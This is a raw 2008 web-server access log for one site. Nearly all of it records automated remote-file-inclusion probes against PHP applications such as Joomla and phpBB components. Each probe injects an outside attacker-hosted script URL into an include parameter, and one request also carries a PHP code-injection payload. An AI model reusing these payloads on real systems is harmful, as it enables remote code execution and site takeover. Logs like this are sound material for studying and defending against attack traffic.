212.92.23.89 - - [14/Jul/2008:10:02:35 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:02:36 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:02:36 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:02:56 -0700] "GET /logs/access_080507.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:03:02 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.217.156.81 - - [14/Jul/2008:10:03:43 -0700] "GET /logs/access_080315.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:04:13 -0700] "GET /logs/index.php?redir=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:04:15 -0700] "GET /index.php?redir=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:04:23 -0700] "GET /logs/index.php?redir=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:04:25 -0700] "GET /index.php?redir=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18399 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [14/Jul/2008:10:05:00 -0700] "GET /logs/access_080329.log/index.php?option=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [14/Jul/2008:10:05:02 -0700] "GET /index.php?option=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 200 18429 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [14/Jul/2008:10:05:02 -0700] "GET /logs/index.php?option=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:10:06:07 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:10:06:10 -0700] "GET /index1.php?p=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [14/Jul/2008:10:06:12 -0700] "GET //modules/My_eGallery/index.php?basepath=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [14/Jul/2008:10:06:32 -0700] "GET /logs/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:06:34 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:06:35 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:06:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:07:20 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:07:20 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:07:20 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:07:21 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:07:47 -0700] "GET /logs//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:07:47 -0700] "GET //components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:10:08:02 -0700] "GET /logs/access_080303.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.81.97.228 - - [14/Jul/2008:10:08:22 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.firestormmedia.com/modules/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
206.81.97.228 - - [14/Jul/2008:10:08:23 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.firestormmedia.com/modules/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
219.141.234.2 - - [14/Jul/2008:10:08:45 -0700] "GET /index1.php?p=http://users5.TitanicHost.com/onix2131/cmda.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:09:46 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:09:47 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:09:47 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.246 - - [14/Jul/2008:10:10:05 -0700] "GET /warboard/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:10:27 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:10:27 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:10:28 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:10:11:00 -0700] "GET /logs/htmltonuke.php?filnavn=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.203.228.120 - - [14/Jul/2008:10:11:00 -0700] "GET /htmltonuke.php?filnavn=http://www.iglesialcs.cl/newweb//images/stories/.bash/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:12:01 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:12:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.20.124 - - [14/Jul/2008:10:12:12 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.monsterclubcat.com//modules/My_eGallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [14/Jul/2008:10:12:28 -0700] "GET /logs//squito/photolist.inc.php?photoroot=http://oliverwebster.com//guestbook/public.htm/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:12:28 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:12:28 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [14/Jul/2008:10:12:28 -0700] "GET //squito/photolist.inc.php?photoroot=http://oliverwebster.com//guestbook/public.htm/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.98.71 - - [14/Jul/2008:10:12:43 -0700] "GET /logs/index.php?redir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [14/Jul/2008:10:12:46 -0700] "GET /index.php?redir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:10:13:03 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.204.195.212 - - [14/Jul/2008:10:13:04 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://bratki2.ovh.org/templates/rhuk_solarflare_ii/images/.know/.../idbot5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:10:14:46 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.59.6.242 - - [14/Jul/2008:10:14:47 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:15:04 -0700] "GET /logs/access_080315.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:15:05 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:15:05 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.113.12.153 - - [14/Jul/2008:10:15:11 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:15:41 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:15:41 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:16:45 -0700] "GET /logs/access_080507.log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:10:17:09 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [14/Jul/2008:10:17:09 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
216.40.230.5 - - [14/Jul/2008:10:17:14 -0700] "GET /logs/access.log/index.php?content=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [14/Jul/2008:10:17:16 -0700] "GET /index.php?content=http://www.suttas.com/files/id.txt?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.230.5 - - [14/Jul/2008:10:17:17 -0700] "GET /logs/index.php?content=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:10:17:22 -0700] "GET /logs/index.php?redir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [14/Jul/2008:10:17:28 -0700] "GET /index.php?redir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18395 "-" "libwww-perl/5.805" "www.dmulk.com"
194.143.183.8 - - [14/Jul/2008:10:17:49 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.244.233.121 - - [14/Jul/2008:10:18:20 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [14/Jul/2008:10:18:20 -0700] "GET //wp-content/plugins/mygallery/myfunctions/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [14/Jul/2008:10:18:20 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:10:18:30 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:10:18:30 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:18:33 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.19.181.120 - - [14/Jul/2008:10:18:33 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:18:42 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.196.211.165 - - [14/Jul/2008:10:18:43 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:18:50 -0700] "GET /logs/index.php?redir=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:18:53 -0700] "GET /index.php?redir=http://www.lisey.ca/sohoadmin/save.txt?? HTTP/1.1" 200 18405 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:10:19:04 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:10:19:04 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:10:19:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:10:19:05 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:10:19:05 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.47.2.136 - - [14/Jul/2008:10:19:05 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://sv-hbc.nl/db/cgi/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:19:11 -0700] "GET /logs/access_080207.log//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:19:11 -0700] "GET //components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:19:12 -0700] "GET /logs//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [14/Jul/2008:10:19:16 -0700] "GET /logs/access_080128.log//modules/My_eGallery/index.php?basepath=http://queb3.info/cruise/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:19:21 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.130.125.73 - - [14/Jul/2008:10:19:22 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.geocities.com/fexcia/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.85.130.159 - - [14/Jul/2008:10:19:30 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.85.130.159 - - [14/Jul/2008:10:19:30 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:19:37 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:19:37 -0700] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:19:38 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:20:00 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.234.201.88 - - [14/Jul/2008:10:20:01 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:21:16 -0700] "GET /blog/index.php/2008/ HTTP/1.0" 200 17261 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:21:16 -0700] "GET /logs/access.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.204.217.1 - - [14/Jul/2008:10:21:17 -0700] "GET /logs/access_071219.log//components/com_simpleboard/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:21:17 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:21:17 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.180.214 - - [14/Jul/2008:10:21:54 -0700] "GET //administrator/components/com_joomla-visites/core/include/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:22:09 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:22:10 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.75.213.114 - - [14/Jul/2008:10:22:10 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:22:23 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.89 - - [14/Jul/2008:10:22:24 -0700] "GET //administrator/components/com_chronocontact/excelwriter/errors.php?error=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:22:53 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:22:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.70.164 - - [14/Jul/2008:10:22:56 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 200 3694 "-" "libwww-perl/5.805" "www.dmulk.com"
201.13.77.148 - - [14/Jul/2008:10:23:19 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.17.200.206 - - [14/Jul/2008:10:23:32 -0700] "GET /logs/access_080129.log//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:10:23:58 -0700] "GET /logs/standard.php?phpbb_root_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.48.114 - - [14/Jul/2008:10:23:58 -0700] "GET /standard.php?phpbb_root_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
74.6.22.88 - - [14/Jul/2008:10:24:07 -0700] "GET /blog/index.php/2008/?show=gallery HTTP/1.0" 200 53323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
